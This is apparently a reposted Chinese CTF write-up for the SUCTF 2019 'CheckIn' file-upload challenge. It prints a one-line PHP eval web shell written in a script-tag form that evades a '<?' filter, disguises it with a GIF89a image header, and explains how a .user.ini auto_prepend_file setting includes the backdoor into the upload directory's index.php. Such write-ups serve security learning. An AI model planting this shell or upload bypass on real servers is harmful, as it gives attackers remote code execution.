BUU-日刷-[SUCTF 2019]CheckIn 1-.user.ini利用
2021/8/30 23:09:46
本文主要是介绍BUU-日刷-[SUCTF 2019]CheckIn 1-.user.ini利用,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
文件上传,首先上传一张图片马试试
提示<?被过滤,可以用下面代码绕过
<script language="php">eval($_POST{attack});</script>
显示上传成功,和已经上传的文件
下面就是想办法上传有效的后门
根据尝试,大部分后缀例如php3,php4,phtml均被过滤了
这里观察可以发现,在文件上传的目录里有个默认的index.php文件
这里就考虑采用.user.ini
首先先说一下.php.ini文件
该文件可以设置一些php的配置,有些重要必须要在这里面设置
但是有些不怎么重要的可以在 .user.ini设置
其中有一个配置可以利用
auto_prepend_file=1.php auto_append_file=2.php
这是一个当前目录下的全局文件包含,例如我们想这一个文件里包含1.php
一般会在文件文件开头写上
include './1.php'; //require
但是对于几百个文件想一次性包含同一个文件,就可以用.user.ini
auto_prepend_file=1.php //是所有文件开头包含1.php auto_append_file=2.php //是所有文件尾包含1.php
这样我们可以上传png格式后门,在将他包含到当前目录下所有的php文件中
这也就是虽然我们没法上传php,但是默认给了个空白php文件的原因
首先上传包含后门代码的png,这里注意 <? 被过滤了,因此要或一种写法
另外会检查图片开头判断是不是图片,可以加速GIF89A绕过
再上传.user.ini
注意,这里包含的文件是刚才传入的图片马
接下来访问uploads目录下的index.php
发现只打印了图片头,说明成功
这篇关于BUU-日刷-[SUCTF 2019]CheckIn 1-.user.ini利用的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-06-26终极指南:Scrum中如何设置需求优先级
- 2024-06-26AI大模型企业应用实战(25)-为Langchain Agent添加记忆功能
- 2024-06-26小白家庭 nas 搭建方案-icode9专业技术文章分享
- 2024-06-23AI大模型企业应用实战(14)-langchain的Embedding
- 2024-06-23AI大模型企业应用实战(15)-langchain核心组件
- 2024-06-23AI大模型企业应用实战(16)-langchain核心组件
- 2024-06-23AI 大模型企业应用实战(06)-初识LangChain
- 2024-06-19EntBot.ai: AI Website Chatbot for Product Guides and Development Doc
- 2024-06-17zero-shot-learning-definition-examples-comparison
- 2024-06-06Package Easy(基于 NSIS 的打包exe安装包工具)使用方法-icode9专业技术文章分享